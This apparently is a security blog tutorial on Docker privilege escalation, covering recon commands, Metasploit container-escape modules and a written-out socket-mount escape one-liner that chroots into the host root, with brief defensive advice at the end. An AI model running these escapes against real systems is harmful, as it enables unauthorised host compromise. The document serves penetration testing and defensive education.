Sandbox99 Chronicles

Introduction

In the rapidly evolving landscape of containerized applications, Docker has become the de facto standard for deploying and managing applications across diverse environments. While Docker provides significant benefits in terms of portability, scalability, and resource efficiency, it also introduces unique security challenges that practitioners must understand and address.

One of the most critical security concerns in containerized environments is privilege escalation—the process by which an attacker gains elevated permissions beyond their initial access level. Unlike traditional server environments where privilege escalation typically follows a linear path from user to root, Docker environments present a more complex security model with multiple layers of isolation and privilege boundaries.

Understanding Docker privilege escalation is crucial for several reasons. First, containers are often deployed with overly permissive configurations, creating unnecessary attack surfaces. Second, the shared kernel architecture between containers and the host system creates potential pathways for sophisticated attacks. Finally, many organizations deploy containers without fully comprehending the security implications of their configuration choices.

This blog post explores the two primary vectors of Docker privilege escalation that security professionals and developers must understand. These scenarios represent fundamentally different attack objectives and require distinct defensive strategies. By examining both in-container privilege escalation and container escape techniques, we’ll provide a comprehensive view of how attackers can exploit Docker environments and how defenders can strengthen their security posture.

Whether you’re a security researcher, DevOps engineer, or system administrator, understanding these privilege escalation scenarios is essential for building robust containerized infrastructures that can withstand modern attack techniques.

The Privilege Escalation

Privilege escalation within a Docker Linux target machine involves two main scenarios:

1. Privilege Escalation within the container itself: You have a low-privileged shell inside the Docker container and want to gain root privileges within that same container.
2. Container Escape (Privilege Escalation to the Host): You have root or a highly privileged user within the Docker container, and you want to break out of the container’s isolation to gain root privileges on the underlying Linux host machine. This is generally the more impactful goal.

Metasploit can be used for both, but the techniques and modules differ.

Scenario 1: Privilege Escalation within the Docker Container (Linux)

If you have a Meterpreter session inside a Linux Docker container as a non-root user, the process is similar to a regular Linux machine:

1. Information Gathering:
   • sysinfo: Get basic OS info (kernel version, architecture).
   • getuid / whoami: Confirm current user.
   • cat /etc/os-release: Get distro details.
   • uname -a: Kernel version.
   • ps aux: Running processes (look for setuid binaries, processes running as root).
   • find / -perm /4000 2>/dev/null: Find SUID binaries.
   • cat /etc/passwd, cat /etc/shadow: Check user accounts (though shadow is usually root-readable).
   • find / -writable -type d 2>/dev/null: Look for writable directories.
   • Check cron jobs, installed packages, vulnerable services, etc.
2. Identify Potential Exploits:
   • Based on the gathered info (especially kernel version, software versions), search for known local privilege escalation vulnerabilities.
   • Metasploit post/linux/gather modules: These can automate some of the information gathering:
     • use post/linux/gather/enum_system
     • use post/linux/gather/enum_protections (though less relevant for inside container PE unless it’s a very specific setup)
     • use post/linux/gather/enum_users_groups
   • post/linux/escalate modules: Metasploit has a few specific Linux LPE modules. You can search for them:
     • msf6 > search type:exploit platform:linux rank:excellent
     • msf6 > search type:post platform:linux escalate
     • Common examples might be older kernel exploits, though finding a universal one for a typical Docker container (which often runs a recent kernel version from the host) can be challenging if the container itself isn’t running old software.
3. Execute the Exploit:
   • Once you’ve identified a promising module, set the SESSION option to your Meterpreter session ID:
     • msf6 > use exploit/linux/local/some_linux_lpe_exploit
     • msf6 exploit(some_linux_lpe_exploit) > set SESSION <your_session_id>
     • msf6 exploit(some_linux_lpe_exploit) > run

Important Note for Docker: Many common Linux privilege escalation techniques (like kernel exploits) might not work within a default unprivileged Docker container because it shares the host’s kernel and has limited capabilities. You’d typically need to find vulnerabilities in the applications running inside the container or misconfigurations.

Scenario 2: Container Escape (Privilege Escalation to the Host)

This is the more advanced and impactful type of privilege escalation when dealing with Docker. It involves breaking out of the container’s isolation to gain control of the host machine. Metasploit has specific modules for this.

Common Docker Escape Vulnerabilities/Techniques and Metasploit Modules:

1. Misconfigured privileged Containers:
   • If a Docker container is run with the --privileged flag or with the SYS_ADMIN capability, it has significantly elevated privileges on the host. This is a classic misconfiguration.
   • Metasploit Module:exploit/linux/local/docker_privileged_container_escape
     • This module often leverages the cgroup feature (specifically release_agent) to execute arbitrary commands on the host as root.
     • Usage:
       • msf6 > use exploit/linux/local/docker_privileged_container_escape
       • msf6 exploit(docker_privileged_container_escape) > set SESSION <your_meterpreter_session_id_in_container>
       • msf6 exploit(docker_privileged_container_escape) > run
2. Mounted Docker Socket (/var/run/docker.sock):
   • If the Docker socket is mounted into the container (e.g., -v /var/run/docker.sock:/var/run/docker.sock), then the container can interact with the Docker daemon on the host. This essentially gives the container full root control over the host’s Docker engine.
   • Manual Exploitation (from within Meterpreter/shell):
     • Check if the socket is mounted: ls -la /var/run/docker.sock
     • If it is, you can use the docker client (if installed in the container) to create and run a new privileged container on the host that mounts the host’s root filesystem.
     • Example (from inside the container’s shell):
       • Bash
       • # Check docker version
       • docker version
       • # Run a new container on the host with the host's root mounted
       • docker run -v /:/host --net=host --pid=host --privileged -it alpine chroot /host
       • # Now you are root on the host!
   • Metasploit Module:exploit/linux/local/docker_daemon_privilege_escalation (This module essentially automates the above process by interacting with the exposed Docker daemon).
     • Usage:
       • msf6 > use exploit/linux/local/docker_daemon_privilege_escalation
       • msf6 exploit(docker_daemon_privilege_escalation) > set SESSION <your_meterpreter_session_id_in_container>
       • msf6 exploit(docker_daemon_privilege_escalation) > run
3. Vulnerabilities in runc or Docker Engine:
   • Periodically, vulnerabilities are discovered in the runc container runtime or the Docker engine itself that can lead to container escapes.
   • Metasploit Modules:
     • exploit/linux/local/docker_runc_escape (CVE-2019-5736): This leverages a flaw in runc where it’s possible to overwrite the runc binary itself, leading to host root when docker exec is used.
     • exploit/linux/local/runc_cwd_priv_esc (CVE-2024-23652, etc.): Newer vulnerabilities sometimes involve file descriptor leaks or race conditions.
   • Usage (check specific module options):
     • msf6 > use exploit/linux/local/docker_runc_escape
     • msf6 exploit(docker_runc_escape) > set SESSION <your_meterpreter_session_id_in_container>
     • msf6 exploit(docker_runc_escape) > run
     • Note: These are often highly dependent on the specific runc/Docker version on the host.
4. Linux Kernel Vulnerabilities (affecting the host):
   • Since containers share the host’s kernel, if the host’s Linux kernel has a known local privilege escalation vulnerability, you might be able to exploit it from within the container to gain root on the host.
   • Example: If the host is running an old kernel with, say, the “Dirty Cow” vulnerability, you could compile and run a Dirty Cow exploit inside the container to get root on the host.
   • Metasploit Modules: Look for exploit/linux/local/ modules that target specific kernel versions.
   • Process:
     • Get the host kernel version from inside the container: uname -a.
     • Search Exploit-DB or Metasploit for LPE exploits for that kernel version.
     • If a Metasploit module exists, use it and set the SESSION option.

General Steps for Docker Privilege Escalation with Metasploit:

1. Get a Session: Obtain an initial Meterpreter session on the Linux Docker container (e.g., through a web application exploit, exposed service, etc.).
2. Initial Recon (inside Meterpreter):
   • sysinfo
   • getuid
   • shell (to get a native shell)
   • From the shell, check for Docker-specific configurations:
     • mount: Look for /var/run/docker.sock or other suspicious mounts.
     • cat /proc/self/cgroup: To see cgroup information, which can hint at container configuration.
     • capsh --print: List capabilities of the current process. Look for CAP_SYS_ADMIN, CAP_DAC_OVERRIDE, etc.
     • Check for /.dockerenv or /.cgroup.clone_children files which indicate you’re in a container.
3. Search Metasploit:
   • msf6 > search docker escape
   • msf6 > search type:exploit platform:linux local docker
4. Select and Configure Module: Choose the most appropriate module based on your reconnaissance (e.g., docker_privileged_container_escape if SYS_ADMIN capability is present, docker_daemon_privilege_escalation if /var/run/docker.sock is mounted).
5. Set Options: Crucially, set the SESSION option to your Meterpreter session ID:
   • msf6 exploit(module_name) > set SESSION <id_of_your_current_meterpreter_session>
   • msf6 exploit(module_name) > show options
   • msf6 exploit(module_name) > run
6. Verify Escalation: After running the exploit, check if you have a new session with higher privileges (e.g., root on the host).

Docker security is a complex topic. Many escapes rely on misconfigurations or older software versions. Always check for the latest vulnerabilities and ensure you understand the context of the container and host.

Defensive Recommendations

Implementing defense-in-depth strategies is crucial for mitigating these risks. This includes running containers with minimal privileges, avoiding privileged containers when possible, implementing proper resource constraints, and maintaining strict separation between container workloads and host systems. Regular security audits of container configurations and runtime monitoring for suspicious activities are equally important.

The Broader Security Context

These privilege escalation techniques highlight the importance of treating containers as part of a broader security ecosystem rather than isolated entities. Container security is inseparable from host security, network security, and application security. Organizations must adopt holistic approaches that consider the entire attack surface, from the application code running within containers to the orchestration platforms managing them.

As containerization continues to evolve, so too will the techniques used to exploit these environments. Staying informed about emerging threats, maintaining up-to-date security practices, and fostering a culture of security awareness within development and operations teams remain the best defenses against sophisticated privilege escalation attacks.

Understanding these privilege escalation scenarios is not just about preventing attacks—it’s about building more resilient, secure, and trustworthy containerized infrastructures that can support business objectives while maintaining strong security postures in an increasingly complex threat landscape.

Key Takeaways

Docker privilege escalation represents a multi-layered security challenge that requires comprehensive understanding and proactive defense strategies. Through our examination of both in-container privilege escalation and container escape scenarios, several critical insights emerge.

The distinction between in-container privilege escalation and container escape is fundamental to understanding Docker security. While gaining root within a container may seem significant, it’s often merely a stepping stone to the more impactful goal of host system compromise. Organizations must design their security strategies to address both scenarios with appropriate controls and monitoring.

Container escape represents the more severe threat vector, as it breaks the fundamental isolation promise of containerization. When an attacker achieves host-level access from within a container, they can potentially compromise the entire infrastructure, access sensitive data from other containers, and establish persistent footholds across the environment.